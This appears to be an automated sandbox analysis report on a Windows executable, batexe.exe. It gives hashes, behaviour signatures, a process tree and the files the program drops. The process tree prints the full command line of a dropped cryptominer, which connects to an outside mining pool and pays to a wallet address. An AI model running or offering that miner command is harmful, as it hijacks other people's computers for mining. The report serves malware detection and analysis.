73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
302s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12-02-2024 06:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
600	b2e.exe
3012	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3012	cpuminer-sse2.exe
3012	cpuminer-sse2.exe
3012	cpuminer-sse2.exe
3012	cpuminer-sse2.exe
3012	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1680-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 600	1680	batexe.exe	75
PID 1680 wrote to memory of 600	1680	batexe.exe	75
PID 1680 wrote to memory of 600	1680	batexe.exe	75
PID 600 wrote to memory of 3080	600	b2e.exe	77
PID 600 wrote to memory of 3080	600	b2e.exe	77
PID 600 wrote to memory of 3080	600	b2e.exe	77
PID 3080 wrote to memory of 3012	3080	cmd.exe	79
PID 3080 wrote to memory of 3012	3080	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Users\Admin\AppData\Local\Temp\9347.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9347.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9347.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\954B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9347.tmp\b2e.exe

Filesize
1.6MB

MD5
7ee0df0f69cd7cdf42920ee6b95ebb50

SHA1
37d20ec8696a3ce502268f3905f9ff280d278786

SHA256
c057fb752af78ce38d14b2b36b1ba2b093e054b3971c611f75c3b73b4493c0d7

SHA512
3d55cc4009b33a300a6bbf49caa81e7c114bd77a6364a41571fad9e03ec160084da71db4290304354b8e7f532d997a9789c3f3c7ddc33f0c593bfabf8eaadc34

Download Submit
C:\Users\Admin\AppData\Local\Temp\9347.tmp\b2e.exe

Filesize
2.1MB

MD5
9c9532724d6213c06cd8e0ef4e6820ec

SHA1
b1e85d60db343662a56723eba77015f58739db6e

SHA256
e872770fbd0edb6cb7d8dc1f4b21d6c0f8f16170a32b0f073359fe8c3a3ba58e

SHA512
cd7033b60d8123291fc62b5cd87fd4383d9bee1c2bdb6d84b03e13361cb62d7991c829b3d88893809ffdf46cc5c74adc1a5aef95135f98ac96a10cce1dfb3c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\954B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
278KB

MD5
f44f435c1b44094b2105f5718ada300d

SHA1
907a35b1f37c2624f121fa56b376323707b91c90

SHA256
54a95214ba674c672634ec7a14a9f984fcc4a4956d7239e4cedf004a09c266e2

SHA512
c4fe80f330bdab0ebf4452206704e092eb0da22cefcf9ed4478d1a446c3cba811bcde7aea12178d2402118c045c836d8cce1b977e6a94bf9673f236a8ccd74ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
382KB

MD5
8aad957b0f9b8823e9363edd70f74ab0

SHA1
158286d88970934a0e053436740cde9c009cfdfb

SHA256
52498efbad22a02c8040932703fcce6a3819778a122b8d340ced822e7db8c03d

SHA512
de27b07563e7ad5f9d09278b533469783cb24fa9d9c93fb595b2a8af1bcade73f756dacba090ea3212c294ad6f9687e35338b020929d3ef81d6a1dd5eb32fc2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
274KB

MD5
8ed5edad5b0b0050249fdd531a182dd3

SHA1
93368cf41c9652ddf842188cbe5840b4d412c79c

SHA256
5a2b8b4fffabf48d55837a31d0c1c47118a33cb005619bad88ddbbbb75e936c8

SHA512
b82cf27218e158e14853b7d0bfad9e42b6520f16298fa5432280c33d7ce4b1f3c49ec59a4bb3e0fbbf1ba29b46f56d19aaf8002405db2644d0aa79a9d4e4208b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
323KB

MD5
76340699d14eea9f01bea8438ada87ee

SHA1
f9bc24380739a0455246e0b515e722428f0774b3

SHA256
04dd264266569db08faf9d86f140b3ba4dad748101c5d7f68f15f0c6e286c5e6

SHA512
eb32852881ea1656b1144a6209725de351f39a91ad4fbb4d9e0b8c3272a451fbfe11e9c44ea4aa1c871291b9a503cfb5c47ce604550f0ccf3c9cfc2bd8778731

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
143KB

MD5
3f47da019d94417e3a434233953c96d4

SHA1
4bee8ee0a17eadb692f97d5c2daee5ae00bd4930

SHA256
6e6dd656b72f1c42440e933860b9118746213d88c23becef8e7c870dba672914

SHA512
b5db763c3ca6c3481f567469685bd4bd19231d582f83809df7c728896861a4c603bbcfadec30254e0e32fd30cfe618fc90e7618a93f79e3fb9838ae578270b78

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
292KB

MD5
b1dfd04124e6dd41373f3b6918e27cb6

SHA1
495bffac59c0e118cfa1c016034d9f16c45e7dde

SHA256
e63d56ce418bf65719c625563581e25836f531afa5b0d7a3d180670645c9b808

SHA512
c5cb4450cd37de9db293fcba7122fa44ae473c750ccc0748d4c61dc19bab4e7ffc74b1fae5cfda5a2dc480a4dc32bdb8cef31292613de5c788b138410cecd058

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
37KB

MD5
170153af7f68170355ef6aa736807b40

SHA1
281a93ccea5dfd67e08c47373fcc3a5c38d4d93a

SHA256
d6671da032fbf00714a92cff107bbc8248595efbd9a4f1d79a0e78a3ad905650

SHA512
eb7fbe2c0104bbe11e8ecfe058ed433107ec00073966f7f81acd9c888ca0f53203686d24abc0a4d792a3cde118b0309430e4a27143309559f0e128268da5fdea

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
220KB

MD5
962cf38739b97a05c3bf12ad9c79328f

SHA1
351810c9fed18fcfd44555f9e8971441d2b054bb

SHA256
21f3d7a8e02a753e1d97f485b7db72ec2088c0ad29badd1cceed35f6866e5f81

SHA512
ac4b768b68b65508ff88fd82645675ab76826a5edf0b1b5e5dda09b6f300621bef3b814e5590a544596bddaf9b31c71ca2dcac6fc90ed11c769893eec4ce6c53

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
149KB

MD5
7c19e12c9a6a3ecceff4e87f9485de6c

SHA1
a4b95132768c823c394ce93236f2a3096d7d292d

SHA256
06cbe7435001c21791f03d28ea68e3811963b736c6702562b02117179c33feed

SHA512
8b799e3da0732f120342f996a3cf519d0319124a029828cd4f9bd8dc4298a3b62d538739197dfa8dd02889f4531e34ceb27004a6e3d05277f7bc76922f14a587

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
152KB

MD5
bff17b184fe719f4abf2afa0d5440c83

SHA1
3be86fb6559360fba54c83fcb659f74f1b56a3fe

SHA256
ad62a3b2387037b817091900bb5683e2c0e516ed77e94cc8c9af9167ef04cd37

SHA512
d8fac60addc9c88d2f32f4b962f0fcaebf888b46f5256fa770a45e79174d73db5a5fc8ec074166f8b0cfdce5fd4e8a9321ba3235b761f3d4c1d6757a87b562d2

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
120KB

MD5
cadcf2104b6d8b54dbf7d1205420a75d

SHA1
b0144aaa6d343267dc1dc0f2ed52277403d4517f

SHA256
82f4c1fe435db6f91d5d0e1a8c116bde095afec12ea9f7d69afa993061c0e3af

SHA512
17dc74775d63a5b3904f62b6f4f989330a2f0b9426210d6b5e567e09cfa0ce4c7c9c29e2121255f36aabbe20b0d5a18394191df2812658a5567dc19e39b52c59

Download Submit
memory/600-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/600-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1680-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3012-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3012-43-0x000000006F0E0000-0x000000006F178000-memory.dmp

Filesize
608KB

Download
memory/3012-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3012-44-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/3012-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3012-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download